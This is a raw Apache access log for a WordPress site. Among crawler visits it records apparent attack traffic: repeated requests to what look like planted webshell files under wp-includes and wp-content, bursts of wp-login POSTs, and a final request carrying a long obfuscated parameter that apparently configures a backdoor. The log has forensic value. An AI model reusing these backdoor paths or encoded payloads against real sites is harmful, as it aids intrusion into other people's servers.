31.57.184.0 - - [14/Apr/2026:05:29:46 +0200] "GET /wp-admin/index.php HTTP/1.1" 200 8156 "https://FTI-HIOS.EU/wp-login.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
31.57.184.0 - - [14/Apr/2026:05:29:47 +0200] "GET /wp-admin/profile.php HTTP/1.1" 200 5065 "https://FTI-HIOS.EU/wp-login.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
31.57.184.0 - - [14/Apr/2026:05:29:47 +0200] "GET /wp-admin/edit.php HTTP/1.1" 200 5065 "https://FTI-HIOS.EU/wp-login.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
31.57.184.0 - - [14/Apr/2026:05:29:47 +0200] "GET /wp-admin/plugins.php HTTP/1.1" 200 5065 "https://FTI-HIOS.EU/wp-login.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
204.12.228.0 - - [14/Apr/2026:05:28:49 +0200] "GET /wp-includes/xa146f6/edit.php?id=171565 HTTP/1.1" 200 3481 "https://fti-hios.eu/wp-includes/xa146f6/edit.php?id=171565" "Mozilla/5.0"
66.249.69.0 - - [14/Apr/2026:05:32:47 +0200] "GET /wp-content/uploads/2017/03/background-2-270x270.jpg HTTP/1.1" 200 25512 "-" "Googlebot-Image/1.0"
101.99.88.0 - - [14/Apr/2026:05:47:22 +0200] "GET / HTTP/1.1" 200 150494 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
101.99.88.0 - - [14/Apr/2026:05:47:24 +0200] "GET /483977457 HTTP/1.1" 200 151061 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
110.249.201.0 - - [14/Apr/2026:05:48:59 +0200] "GET /robots.txt HTTP/1.1" 200 3788 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
216.73.216.0 - - [14/Apr/2026:05:49:48 +0200] "GET /robots.txt HTTP/1.1" 200 3764 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.0 - - [14/Apr/2026:05:49:48 +0200] "GET /?fileloc=%2Fhome%2Fhios%2Fpublic_html%2Fgoogle256836def29820fd.html&path=%2Fhome%2Fhios%2Fpublic_html HTTP/1.1" 200 2254 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
204.12.208.0 - - [14/Apr/2026:05:57:45 +0200] "GET /wp-includes/xa146f6/edit.php HTTP/1.1" 200 3572 "https://fti-hios.eu/wp-includes/xa146f6/edit.php" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; ja-jp) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
204.12.208.0 - - [14/Apr/2026:05:57:25 +0200] "GET /wp-includes/xa146f6/edit.php HTTP/1.1" 200 3537 "https://fti-hios.eu/wp-includes/xa146f6/edit.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7"
204.12.228.0 - - [14/Apr/2026:05:59:09 +0200] "GET /wp-includes/xa146f6/edit.php?id=171565 HTTP/1.1" 200 3481 "https://fti-hios.eu/wp-includes/xa146f6/edit.php?id=171565" "Mozilla/5.0"
173.208.148.0 - - [14/Apr/2026:06:00:57 +0200] "GET / HTTP/1.1" 200 44167 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
173.208.148.0 - - [14/Apr/2026:06:00:58 +0200] "GET / HTTP/1.1" 200 162129 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
173.208.148.0 - - [14/Apr/2026:06:01:00 +0200] "GET /index.php?params=1 HTTP/1.1" 200 40687 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
66.249.75.0 - - [14/Apr/2026:06:01:59 +0200] "GET /166024226 HTTP/1.1" 200 24308 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.75.0 - - [14/Apr/2026:06:02:01 +0200] "GET /contents/renga/ HTTP/1.1" 200 23383 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.75.0 - - [14/Apr/2026:06:02:07 +0200] "GET /contents/event/kansyasai/ HTTP/1.1" 200 24286 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; GoogleOther)"
204.12.228.0 - - [14/Apr/2026:06:00:36 +0200] "GET /wp-includes/xa146f6/edit.php?id=171565 HTTP/1.1" 200 3481 "https://fti-hios.eu/wp-includes/xa146f6/edit.php?id=171565" "Mozilla/5.0"
119.28.194.0 - - [14/Apr/2026:06:02:59 +0200] "GET /robots.txt HTTP/1.1" 200 3820 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
173.208.148.0 - - [14/Apr/2026:06:16:31 +0200] "GET / HTTP/1.1" 200 44167 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
173.208.148.0 - - [14/Apr/2026:06:16:32 +0200] "GET / HTTP/1.1" 200 162157 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
173.208.148.0 - - [14/Apr/2026:06:16:33 +0200] "GET /index.php?params=1 HTTP/1.1" 200 40687 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
103.177.124.0 - - [14/Apr/2026:06:21:28 +0200] "GET /wp-includes/theme-compat/eeogmugh.php HTTP/1.1" 403 400 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36"
103.177.124.0 - - [14/Apr/2026:06:21:29 +0200] "GET /favicon.ico HTTP/1.1" 200 222 "http://fti-hios.eu/wp-includes/theme-compat/eeogmugh.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36"
103.177.124.0 - - [14/Apr/2026:06:21:47 +0200] "GET /wp-includes/theme-compat/options.php HTTP/1.1" 200 3832 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36"
103.177.124.0 - - [14/Apr/2026:06:21:48 +0200] "GET /favicon.ico HTTP/1.1" 200 222 "http://fti-hios.eu/wp-includes/theme-compat/options.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36"
103.177.124.0 - - [14/Apr/2026:06:22:09 +0200] "GET /wp-includes/theme-compat/options.php HTTP/1.1" 200 3832 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36"
103.177.124.0 - - [14/Apr/2026:06:22:10 +0200] "GET /favicon.ico HTTP/1.1" 200 222 "http://fti-hios.eu/wp-includes/theme-compat/options.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36"
103.177.124.0 - - [14/Apr/2026:06:22:46 +0200] "GET /options.php HTTP/1.1" 200 709 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36"
103.177.124.0 - - [14/Apr/2026:06:22:46 +0200] "GET /favicon.ico HTTP/1.1" 200 222 "http://fti-hios.eu/options.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36"
103.177.124.0 - - [14/Apr/2026:06:22:57 +0200] "GET /wp-includes/theme-compat/ulmoljao.php HTTP/1.1" 403 400 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36"
103.177.124.0 - - [14/Apr/2026:06:22:57 +0200] "GET /favicon.ico HTTP/1.1" 200 222 "http://fti-hios.eu/wp-includes/theme-compat/ulmoljao.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36"
103.177.124.0 - - [14/Apr/2026:06:23:09 +0200] "GET /wp-includes/theme-compat/wp-load.php HTTP/1.1" 403 400 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36"
103.177.124.0 - - [14/Apr/2026:06:23:10 +0200] "GET /favicon.ico HTTP/1.1" 200 222 "http://fti-hios.eu/wp-includes/theme-compat/wp-load.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36"
103.177.124.0 - - [14/Apr/2026:06:23:19 +0200] "GET /wp-includes/theme-compat/inputs.php HTTP/1.1" 403 400 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36"
103.177.124.0 - - [14/Apr/2026:06:23:20 +0200] "GET /favicon.ico HTTP/1.1" 200 222 "http://fti-hios.eu/wp-includes/theme-compat/inputs.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36"
85.137.48.0 - - [14/Apr/2026:06:24:56 +0200] "GET /txets.php HTTP/1.1" 403 400 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
66.249.82.0 - - [14/Apr/2026:06:25:46 +0200] "GET /.well-known/traffic-advice HTTP/1.1" 200 7233 "-" "Chrome Privacy Preserving Prefetch Proxy"
193.186.4.0 - - [14/Apr/2026:06:25:46 +0200] "GET /289684681 HTTP/1.1" 200 3852 "https://www.google.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36"
204.12.208.0 - - [14/Apr/2026:06:32:39 +0200] "GET /wp-includes/xa146f6/edit.php HTTP/1.1" 200 3572 "https://fti-hios.eu/wp-includes/xa146f6/edit.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.1 (KHTML, like Gecko) RockMelt/0.9.64.361 Chrome/13.0.782.218 Safari/535.1"
204.12.208.0 - - [14/Apr/2026:06:32:19 +0200] "GET /wp-includes/xa146f6/edit.php HTTP/1.1" 200 3500 "https://fti-hios.eu/wp-includes/xa146f6/edit.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; EasyBits GO v1.0; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
103.179.150.0 - - [14/Apr/2026:06:34:17 +0200] "GET /admin.php HTTP/1.1" 200 7233 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36 Edg/146.0.0.0"
103.179.150.0 - - [14/Apr/2026:06:34:24 +0200] "GET /favicon.ico HTTP/1.1" 200 389 "https://fti-hios.eu/admin.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36 Edg/146.0.0.0"
204.12.228.0 - - [14/Apr/2026:06:33:47 +0200] "GET /wp-includes/xa146f6/edit.php?id=171565 HTTP/1.1" 200 3481 "https://fti-hios.eu/wp-includes/xa146f6/edit.php?id=171565" "Mozilla/5.0"
204.12.228.0 - - [14/Apr/2026:06:35:15 +0200] "GET /wp-includes/xa146f6/edit.php?id=171565 HTTP/1.1" 200 3481 "https://fti-hios.eu/wp-includes/xa146f6/edit.php?id=171565" "Mozilla/5.0"
204.12.228.0 - - [14/Apr/2026:06:36:58 +0200] "GET /wp-includes/xa146f6/edit.php?id=171565 HTTP/1.1" 200 3481 "https://fti-hios.eu/wp-includes/xa146f6/edit.php?id=171565" "Mozilla/5.0"
66.249.75.0 - - [14/Apr/2026:06:39:30 +0200] "GET /information/privacy_policy.html HTTP/1.1" 200 24282 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; GoogleOther)"
203.168.241.0 - - [14/Apr/2026:06:46:41 +0200] "GET / HTTP/1.1" 200 3776 "http://fti-hios.eu" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36"
203.168.241.0 - - [14/Apr/2026:06:46:42 +0200] "GET / HTTP/1.1" 200 20783 "http://fti-hios.eu" "Mozilla/5.0+(compatible;+Googlebot/2.1;++http://www.google.com/bot.html)"
66.249.69.0 - - [14/Apr/2026:06:48:16 +0200] "GET /1935743 HTTP/1.1" 200 24519 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.75.0 - - [14/Apr/2026:06:55:57 +0200] "GET /111000994.html HTTP/1.1" 200 24453 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.75.0 - - [14/Apr/2026:06:56:04 +0200] "GET /240038466 HTTP/1.1" 200 25093 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.75.0 - - [14/Apr/2026:06:56:11 +0200] "GET /252011136 HTTP/1.1" 200 24324 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.75.0 - - [14/Apr/2026:06:56:17 +0200] "GET /032049590 HTTP/1.1" 200 24409 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; GoogleOther)"
216.73.216.0 - - [14/Apr/2026:07:02:19 +0200] "GET /robots.txt HTTP/1.1" 200 3764 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.0 - - [14/Apr/2026:07:02:20 +0200] "GET / HTTP/1.1" 200 3892 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.0 - - [14/Apr/2026:07:03:42 +0200] "GET /buy.php HTTP/1.1" 200 41512 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
107.150.52.0 - - [14/Apr/2026:07:04:12 +0200] "GET /wp-content/pl773ae4/index.php HTTP/1.1" 200 3377 "https://fti-hios.eu/wp-content/pl773ae4/index.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
204.12.208.0 - - [14/Apr/2026:07:07:39 +0200] "GET /wp-includes/xa146f6/edit.php HTTP/1.1" 200 3572 "https://fti-hios.eu/wp-includes/xa146f6/edit.php" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; ja-jp) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.22"
66.249.75.0 - - [14/Apr/2026:07:07:44 +0200] "GET /robots.txt HTTP/1.1" 200 3820 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
204.12.208.0 - - [14/Apr/2026:07:07:19 +0200] "GET /wp-includes/xa146f6/edit.php HTTP/1.1" 200 3537 "https://fti-hios.eu/wp-includes/xa146f6/edit.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.5; rv:8.0.1) Gecko/20100101 Firefox/8.0.1"
204.12.228.0 - - [14/Apr/2026:07:08:50 +0200] "GET /wp-includes/xa146f6/edit.php?id=171565 HTTP/1.1" 200 3481 "https://fti-hios.eu/wp-includes/xa146f6/edit.php?id=171565" "Mozilla/5.0"
204.12.228.0 - - [14/Apr/2026:07:10:40 +0200] "GET /wp-includes/xa146f6/edit.php?id=171565 HTTP/1.1" 200 3481 "https://fti-hios.eu/wp-includes/xa146f6/edit.php?id=171565" "Mozilla/5.0"
204.12.228.0 - - [14/Apr/2026:07:12:12 +0200] "GET /wp-includes/xa146f6/edit.php?id=171565 HTTP/1.1" 200 3481 "https://fti-hios.eu/wp-includes/xa146f6/edit.php?id=171565" "Mozilla/5.0"
105.113.107.0 - - [14/Apr/2026:07:15:11 +0200] "GET /wp-login.php HTTP/1.1" 200 44180 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0"
105.113.107.0 - - [14/Apr/2026:07:15:11 +0200] "GET /wp-login.php HTTP/1.1" 200 44180 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0"
105.113.107.0 - - [14/Apr/2026:07:15:12 +0200] "POST /wp-login.php HTTP/1.1" 200 40889 "https://www.fti-hios.eu/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0"
105.113.107.0 - - [14/Apr/2026:07:15:12 +0200] "POST /wp-login.php HTTP/1.1" 200 40889 "https://www.fti-hios.eu/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0"
105.113.107.0 - - [14/Apr/2026:07:15:12 +0200] "POST /wp-login.php HTTP/1.1" 200 40889 "https://www.fti-hios.eu/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0"
105.113.107.0 - - [14/Apr/2026:07:15:12 +0200] "POST /wp-login.php HTTP/1.1" 200 40889 "https://www.fti-hios.eu/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0"
204.12.228.0 - - [14/Apr/2026:07:13:47 +0200] "GET /wp-includes/xa146f6/edit.php?id=171565 HTTP/1.1" 200 3481 "https://fti-hios.eu/wp-includes/xa146f6/edit.php?id=171565" "Mozilla/5.0"
204.12.228.0 - - [14/Apr/2026:07:15:18 +0200] "GET /wp-includes/xa146f6/edit.php?id=171565 HTTP/1.1" 200 3481 "https://fti-hios.eu/wp-includes/xa146f6/edit.php?id=171565" "Mozilla/5.0"
204.12.228.0 - - [14/Apr/2026:07:16:50 +0200] "GET /wp-includes/xa146f6/edit.php?id=171565 HTTP/1.1" 200 3481 "https://fti-hios.eu/wp-includes/xa146f6/edit.php?id=171565" "Mozilla/5.0"
23.180.120.0 - - [14/Apr/2026:07:21:03 +0200] "GET / HTTP/1.1" 200 7038 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0"
216.73.216.0 - - [14/Apr/2026:07:24:47 +0200] "GET /buy.php HTTP/1.1" 200 41348 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.0 - - [14/Apr/2026:07:24:59 +0200] "GET / HTTP/1.1" 200 7177 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.245.186.0 - - [14/Apr/2026:07:34:18 +0200] "GET /wp-mail.php/wp-includes/admin.php HTTP/1.1" 403 3548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"
20.245.186.0 - - [14/Apr/2026:07:34:19 +0200] "GET /wp-mail.php/wp-includes/admin.php HTTP/1.1" 403 3706 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
103.74.173.0 - - [14/Apr/2026:07:36:43 +0200] "GET //about.php HTTP/1.1" 200 3832 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
103.74.173.0 - - [14/Apr/2026:07:36:44 +0200] "POST //about.php HTTP/1.1" 200 3831 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
103.74.173.0 - - [14/Apr/2026:07:36:44 +0200] "POST //about.php HTTP/1.1" 200 3869 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
103.74.173.0 - - [14/Apr/2026:07:36:44 +0200] "GET //txets.php HTTP/1.1" 403 399 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
216.73.216.0 - - [14/Apr/2026:07:37:58 +0200] "GET / HTTP/1.1" 200 7177 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
104.210.140.0 - - [14/Apr/2026:07:40:18 +0200] "GET /robots.txt HTTP/1.1" 200 3764 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
216.73.216.0 - - [14/Apr/2026:07:40:55 +0200] "GET / HTTP/1.1" 200 7177 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
103.74.173.0 - - [14/Apr/2026:07:42:29 +0200] "GET //about.php HTTP/1.1" 200 7233 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.0.0 Safari/537.36"
20.245.186.0 - - [14/Apr/2026:07:42:30 +0200] "GET /wp-mail.php/wp-includes/admin.php HTTP/1.1" 403 400 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"
20.245.186.0 - - [14/Apr/2026:07:42:30 +0200] "GET /wp-mail.php/wp-includes/admin.php HTTP/1.1" 403 363 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
34.66.168.0 - - [14/Apr/2026:07:42:32 +0200] "POST / HTTP/1.1" 200 7196 "https://fti-hios.eu/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
103.74.173.0 - - [14/Apr/2026:07:42:42 +0200] "GET /favicon.ico HTTP/1.1" 200 389 "https://fti-hios.eu//about.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.0.0 Safari/537.36"
204.12.208.0 - - [14/Apr/2026:07:43:40 +0200] "GET /wp-includes/xa146f6/edit.php HTTP/1.1" 200 3572 "https://fti-hios.eu/wp-includes/xa146f6/edit.php" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.107 Safari/535.1"
204.12.208.0 - - [14/Apr/2026:07:43:20 +0200] "GET /wp-includes/xa146f6/edit.php HTTP/1.1" 200 3500 "https://fti-hios.eu/wp-includes/xa146f6/edit.php" "Mozilla/4.0 (compatible; GoogleToolbar 5.0.2124.2070; Windows 6.0; MSIE 8.0.6001.18241)"
103.74.173.0 - - [14/Apr/2026:07:44:53 +0200] "POST //about.php HTTP/1.1" 200 4123 "https://fti-hios.eu//about.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.0.0 Safari/537.36"
103.74.173.0 - - [14/Apr/2026:07:44:54 +0200] "GET /favicon.ico HTTP/1.1" 200 251 "https://fti-hios.eu//about.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.0.0 Safari/537.36"
103.74.173.0 - - [14/Apr/2026:07:45:49 +0200] "GET //about.php HTTP/1.1" 200 4085 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.0.0 Safari/537.36"
103.74.173.0 - - [14/Apr/2026:07:45:59 +0200] "GET /favicon.ico HTTP/1.1" 200 389 "https://fti-hios.eu//about.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.0.0 Safari/537.36"
63.141.253.0 - - [14/Apr/2026:07:46:20 +0200] "GET / HTTP/1.1" 200 3795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
63.141.253.0 - - [14/Apr/2026:07:46:20 +0200] "GET / HTTP/1.1" 200 20706 "-" "Googlebot/2.1 (+http://www.googlebot.com/bot.html)"
204.12.228.0 - - [14/Apr/2026:07:44:52 +0200] "GET /wp-includes/xa146f6/edit.php?id=171565 HTTP/1.1" 200 3481 "https://fti-hios.eu/wp-includes/xa146f6/edit.php?id=171565" "Mozilla/5.0"
204.12.228.0 - - [14/Apr/2026:07:47:05 +0200] "GET /wp-includes/xa146f6/edit.php?id=171565 HTTP/1.1" 200 3481 "https://fti-hios.eu/wp-includes/xa146f6/edit.php?id=171565" "Mozilla/5.0"
66.249.69.0 - - [14/Apr/2026:07:49:49 +0200] "GET /wp-content/uploads/2017/03/BoschmanLogo-1-270x270.png HTTP/1.1" 200 10348 "-" "Googlebot-Image/1.0"
204.12.228.0 - - [14/Apr/2026:07:48:34 +0200] "GET /wp-includes/xa146f6/edit.php?id=171565 HTTP/1.1" 200 3481 "https://fti-hios.eu/wp-includes/xa146f6/edit.php?id=171565" "Mozilla/5.0"
103.74.173.0 - - [14/Apr/2026:07:51:37 +0200] "GET //txets.php?ARRAY=7o2230223n313737363134393439342p2231223n22687474703n5p2s5p2s6p776n3132342r73696p76692r63616q5p2s3s6p633q6175746s5s636s646526633q6148523063446s764p327833616n45794r43357n615778326153356n59573076267869616r5s64616r5s6r756q3q3526687474705s686s73743q6674692q68696s732r6575266n633q312668746163636573733q3126726s626s74733q31266175746s5s66696p655s6r616q653q74786574732r706870266p61695s7975616r3q3026743q313737363134353839342q3934356664356438643030363462666130663463613437343230376439653463222p2232223n223462386430633165323536383232306665396362363964646335363339373935222p2233223n226638613531633563383166656138353739393038393634373032363437643264222p226175746s5s66696p655s6r616q65223n2274786574732r706870222p226175746s5s70617373223n2232322q35302q35382q36332q37342q39302q3135222p2262696r675s70617373223n2232322q35302q35382q36332q37342q39302q3135222p2262696r675s737973223n7o226175746s5s6o756s5s7n68616r223n2231222p22756r696r7374616p6p223n2231227q7q HTTP/1.1" 403 3743 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.0.0 Safari/537.36"
